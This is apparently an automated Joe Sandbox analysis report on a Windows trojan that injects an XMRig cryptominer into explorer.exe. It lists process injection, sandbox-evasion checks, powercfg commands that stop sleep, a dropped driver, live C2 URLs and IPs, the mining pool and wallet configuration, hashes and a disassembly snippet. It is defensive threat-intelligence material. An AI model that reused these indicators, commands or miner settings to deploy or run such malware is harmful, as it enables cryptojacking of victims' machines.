        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0wg%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\explorer.exeNetwork Connect: 104.238.180.207 10300Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 185.215.113.217 80Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeMemory written: PID: 572 base: 140000000 value: 4DJump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeMemory written: PID: 572 base: 140001000 value: NUJump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeMemory written: PID: 572 base: 140665000 value: DFJump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeMemory written: PID: 572 base: 140834000 value: 00Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeMemory written: PID: 572 base: 46C010 value: 00Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeThread register set: target process: 572Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
        Source: explorer.exe, 00000009.00000003.2075334619.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":241,"type":"xmrig","pool":"xmr-us-west1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"x","user":"86BLuj7odUF2wu65EHo3KWC6FBM8x4BghXVgRKRH5wZvKgtf4tFQRwTMJ2QTAE4Mu7P2kDWNgpzrGPD3CKGenxvgMT5r4sP","hashrate":221.72391161671408,"status":2}
        Source: explorer.exe, 00000009.00000002.4533205171.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Manager
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: khwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":241,"type":"xmrig","pool":"xmr-us-west1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"x","user":"86BLuj7odUF2wu65EHo3KWC6FBM8x4BghXVgRKRH5wZvKgtf4tFQRwTMJ2QTAE4Mu7P2kDWNgpzrGPD3CKGenxvgMT5r4sP","hashrate":221.72391161671408,"status":2}
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533824531.0000000002880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
        Source: explorer.exe, 00000009.00000002.4533205171.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managermqhk
        Source: explorer.exe, 00000009.00000002.4533824531.0000000002880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerxmr-us-west1.nanopool.org86BLuj7odUF2wu65EHo3KWC6FBM8x4BghXVgRKRH5wZvKgtf4tFQRwTMJ2QTAE4Mu7P2kDWNgpzrGPD3CKGenxvgMT5r4sP
        Source: explorer.exe, 00000009.00000002.4533824531.0000000002880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere=C:
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"vdxneboafwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
        Source: explorer.exe, 00000009.00000003.2075334619.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation
        1
        Windows Service
        1
        Windows Service
        12
        Virtualization/Sandbox Evasion
        OS Credential Dumping221
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Standard Port
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading
        312
        Process Injection
        312
        Process Injection
        LSASS Memory12
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        DLL Side-Loading
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS3
        System Information Discovery
        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577340 Sample: 88aext0k.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 32 xmr-us-west1.nanopool.org 2->32 38 Suricata IDS alerts for network traffic 2->38 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for submitted file 2->42 46 4 other signatures 2->46 8 88aext0k.exe 1 2->8         started        signatures3 44 DNS related to crypt mining pools 32->44 process4 file5 30 C:\Users\user\AppData\...\ztaigjkbyfjh.sys, PE32+ 8->30 dropped 48 Injects code into the Windows Explorer (explorer.exe) 8->48 50 Uses powercfg.exe to modify the power settings 8->50 52 Modifies the context of a thread in another process (thread injection) 8->52 54 2 other signatures 8->54 12 explorer.exe 8->12         started        16 powercfg.exe 1 8->16         started        18 powercfg.exe 1 8->18         started        20 2 other processes 8->20 signatures6 process7 dnsIp8 34 104.238.180.207, 10300, 49704 AS-CHOOPAUS United States 12->34 36 185.215.113.217, 49705, 49812, 49944 WHOLESALECONNECTIONSNL Portugal 12->36 56 System process connects to network (likely due to code injection or exploit) 12->56 58 Query firmware table information (likely to detect VMs) 12->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->60 22 conhost.exe 16->22         started        24 conhost.exe 18->24         started        26 conhost.exe 20->26         started        28 conhost.exe 20->28         started        signatures9 62 Detected Stratum mining protocol 34->62 process10

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        88aext0k.exe74%ReversingLabsWin64.Trojan.MintZard
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sys5%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://185.215.113.217/Deliberate/api/endpoint.phpE100%Avira URL Cloudphishing
        http://185.215.113.217/Deliberate/api/endpoint.phpvdxneboafwevufev100%Avira URL Cloudphishing
        http://185.215.113.217/Deliberate/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=5--cinit-id100%Avira URL Cloudphishing
        http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csv100%Avira URL Cloudphishing
        http://185.215.113.217100%Avira URL Cloudphishing
        http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csvc100%Avira URL Cloudphishing
        http://185.215.113.217/Deliberate/api/endpoint.php100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        xmr-us-west1.nanopool.org
        45.76.65.223
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://185.215.113.217/Deliberate/api/endpoint.phptrue
          • Avira URL Cloud: phishing
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://185.215.113.217/Deliberate/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=5--cinit-idexplorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csvcexplorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.215.113.217explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.215.113.217/Deliberate/api/endpoint.phpEexplorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.215.113.217/Deliberate/api/endpoint.phpvdxneboafwevufevexplorer.exe, 00000009.00000003.2063381261.0000000000672000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csvexplorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.238.180.207
          unknownUnited States
          20473AS-CHOOPAUStrue
          185.215.113.217
          unknownPortugal
          206894WHOLESALECONNECTIONSNLtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577340
          Start date and time:2024-12-18 12:08:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 41s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:88aext0k.exe
          Detection:MAL
          Classification:mal100.spyw.evad.mine.winEXE@15/1@1/2
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target 88aext0k.exe, PID 2800 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: 88aext0k.exe
          TimeTypeDescription
          06:08:57API Interceptor1x Sleep call for process: 88aext0k.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.238.180.207fnULzmEMNo.exeGet hashmaliciousXmrigBrowse
            fnULzmEMNo.exeGet hashmaliciousXmrigBrowse
              185.215.113.2176R0yrvM8Hk.exeGet hashmaliciousXmrigBrowse
              • 185.215.113.217/Deliberate/api/endpoint.php
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
              • 185.215.113.217/CoreOPT/index.php?scr=1
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
              • 185.215.113.217/CoreOPT/index.php?scr=1
              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
              • 185.215.113.217/CoreOPT/index.php
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
              • 185.215.113.217/CoreOPT/index.php
              file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
              • 185.215.113.217/CoreOPT/index.php?wal=1
              0j6nSbUQQS.dllGet hashmaliciousAmadeyBrowse
              • 185.215.113.217/CoreOPT/index.php?wal=1
              uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
              • 185.215.113.217/CoreOPT/index.php
              uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
              • 185.215.113.217/CoreOPT/index.php
              mU3Ob2XcCt.dllGet hashmaliciousAmadeyBrowse
              • 185.215.113.217/CoreOPT/index.php?wal=1
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              xmr-us-west1.nanopool.org6R0yrvM8Hk.exeGet hashmaliciousXmrigBrowse
              • 45.32.71.82
              DuerS8cMn1.exeGet hashmaliciousXmrigBrowse
              • 207.246.100.198
              SecuriteInfo.com.Trojan.Siggen25.64233.10125.12605.exeGet hashmaliciousXmrigBrowse
              • 66.42.105.146
              file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, LummaC Stealer, RedLine, SmokeLoaderBrowse
              • 45.76.65.223
              fnULzmEMNo.exeGet hashmaliciousXmrigBrowse
              • 45.76.65.223
              fnULzmEMNo.exeGet hashmaliciousXmrigBrowse
              • 207.246.100.198
              file.exeGet hashmaliciousRedLine, XmrigBrowse
              • 66.42.105.146
              dllhost.exeGet hashmaliciousNanominerBrowse
              • 45.76.65.223
              e888888888.dllGet hashmaliciousUnknownBrowse
              • 45.32.71.82
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WHOLESALECONNECTIONSNLam209.exeGet hashmaliciousAmadeyBrowse
              • 185.215.113.209
              cred64.dll.dllGet hashmaliciousAmadeyBrowse
              • 185.215.113.209
              random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 185.215.113.43
              stealc_default2.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.17
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 185.215.113.43
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 185.215.113.43
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 185.215.113.43
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 185.215.113.43
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 185.215.113.43
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
              • 185.215.113.43
              AS-CHOOPAUSardware-v1.exeGet hashmaliciousLummaCBrowse
              • 45.77.249.79
              ardware-v1.exeGet hashmaliciousLummaCBrowse
              • 45.77.249.79
              66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
              • 45.77.249.79
              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
              • 45.63.94.214
              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
              • 45.77.249.79
              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
              • 45.77.249.79
              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
              • 45.77.249.79
              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
              • 45.77.249.79
              Setup.exe (1).zipGet hashmaliciousUnknownBrowse
              • 209.222.21.115
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
              • 45.77.249.79
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sysgaozw40v.exeGet hashmaliciousXmrigBrowse
                c2.exeGet hashmaliciousXmrigBrowse
                  ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                    ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                        feZvV3DCj8.exeGet hashmaliciousXmrigBrowse
                          services64.exeGet hashmaliciousXmrigBrowse
                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                              file.exeGet hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                  Process:C:\Users\user\Desktop\88aext0k.exe
                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14544
                                  Entropy (8bit):6.2660301556221185
                                  Encrypted:false
                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 5%
                                  Joe Sandbox View:
                                  • Filename: gaozw40v.exe, Detection: malicious, Browse
                                  • Filename: c2.exe, Detection: malicious, Browse
                                  • Filename: ldr.ps1, Detection: malicious, Browse
                                  • Filename: ZppxPm0ASs.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: feZvV3DCj8.exe, Detection: malicious, Browse
                                  • Filename: services64.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Reputation:high, very likely benign file
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Entropy (8bit):6.5209995838115065
                                  TrID:
                                  • Win64 Executable GUI (202006/5) 92.65%
                                  • Win64 Executable (generic) (12005/4) 5.51%
                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                  • DOS Executable Generic (2002/1) 0.92%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:88aext0k.exe
                                  File size:5'168'640 bytes
                                  MD5:3d375d10b594f69c51b80948ec0e4c03
                                  SHA1:439779b78363df27d5874efb256aa5e415e0b8b3
                                  SHA256:8f861c2089520549eb6c1eb3cba713a8316ffe9f3573199e27cb48bd5e1ca704
                                  SHA512:635d39a32aa3c01cf2d7c5910639da9dbc7f661daba92d0b6c6d543123aa84bfac86dc7c72d6f88ace93d4d2b520e5020094d11f8d78c6859ea68265e8dad560
                                  SSDEEP:98304:VlPQoHOVR78LR77DWaPL+RbDQuAv9QyhT/UxEdmrm:VGoHWB6Uaz+RfQBlhL8Edf
                                  TLSH:B33623E4F78269C9D03BF43D69DF78182ACF54C329F69C78988291C3DEB5A8641316C9
                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....U.g.........."......^...|N.....@..........@.............................@O...........`........................................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x140001140
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x140000000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x672E5598 [Fri Nov 8 18:16:56 2024 UTC]
                                  TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:69b5272077c55acc3c107da8471ab948
                                  Instruction
                                  dec eax
                                  sub esp, 28h
                                  dec eax
                                  mov eax, dword ptr [00005ED5h]
                                  mov dword ptr [eax], 00000001h
                                  call 00007FE904C1AB9Fh
                                  nop
                                  nop
                                  nop
                                  dec eax
                                  add esp, 28h
                                  ret
                                  nop
                                  inc ecx
                                  push edi
                                  inc ecx
                                  push esi
                                  push esi
                                  push edi
                                  push ebx
                                  dec eax
                                  sub esp, 20h
                                  dec eax
                                  mov eax, dword ptr [00000030h]
                                  dec eax
                                  mov edi, dword ptr [eax+08h]
                                  dec eax
                                  mov esi, dword ptr [00005EC9h]
                                  xor eax, eax
                                  dec eax
                                  cmpxchg dword ptr [esi], edi
                                  sete bl
                                  je 00007FE904C1ABC0h
                                  dec eax
                                  cmp edi, eax
                                  je 00007FE904C1ABBBh
                                  dec esp
                                  mov esi, dword ptr [000077D9h]
                                  nop word ptr [eax+eax+00000000h]
                                  mov ecx, 000003E8h
                                  inc ecx
                                  call esi
                                  xor eax, eax
                                  dec eax
                                  cmpxchg dword ptr [esi], edi
                                  sete bl
                                  je 00007FE904C1AB97h
                                  dec eax
                                  cmp edi, eax
                                  jne 00007FE904C1AB79h
                                  dec eax
                                  mov edi, dword ptr [00005E90h]
                                  mov eax, dword ptr [edi]
                                  cmp eax, 01h
                                  jne 00007FE904C1AB9Eh
                                  mov ecx, 0000001Fh
                                  call 00007FE904C20534h
                                  jmp 00007FE904C1ABB9h
                                  cmp dword ptr [edi], 00000000h
                                  je 00007FE904C1AB9Bh
                                  mov byte ptr [004ED271h], 00000001h
                                  jmp 00007FE904C1ABABh
                                  mov dword ptr [edi], 00000001h
                                  dec eax
                                  mov ecx, dword ptr [00005E7Ah]
                                  dec eax
                                  mov edx, dword ptr [00005E7Bh]
                                  call 00007FE904C2052Bh
                                  mov eax, dword ptr [edi]
                                  cmp eax, 01h
                                  jne 00007FE904C1ABABh
                                  dec eax
                                  mov ecx, dword ptr [00005E50h]
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x86a80x3c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4f00000x174.pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4f30000x78.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x70a00x28.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x74100x138.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x88400x158.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x5cf60x5e0064b48118113bc647b5ca61bfb30e39a0False0.5314577792553191data6.2169823173596495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x70000x1dec0x1e00d22e5820f1cf7dcf87069b4f6a2b9a5bFalse0.483203125data4.779784318796937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x90000x4e65400x4e5600a27e0ee56058ea1cfc5cf5c7f2873cdfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .pdata0x4f00000x1740x2009577d63334a2a0f808667aab740485caFalse0.48828125data3.0358184246689297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .00cfg0x4f10000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .tls0x4f20000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .reloc0x4f30000x780x200ee4bf81e4dac9d6d794e14d67c9f87b9False0.232421875data1.4344101157568763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  DLLImport
